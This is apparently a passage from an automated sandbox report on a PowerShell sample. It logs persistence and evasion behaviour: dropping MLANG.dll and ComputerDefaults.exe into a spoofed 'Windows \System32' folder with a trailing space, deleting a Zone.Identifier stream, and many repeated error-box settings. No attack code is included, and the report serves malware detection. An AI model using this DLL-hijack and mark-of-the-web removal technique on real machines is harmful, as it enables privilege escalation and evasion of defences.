Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B962316 push 8B485F93h; iretd 5_2_00007FFD9B96231B

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\ComputerDefaults.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\MLANG.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\ComputerDefaults.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\MLANG.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\MLANG.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\ComputerDefaults.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
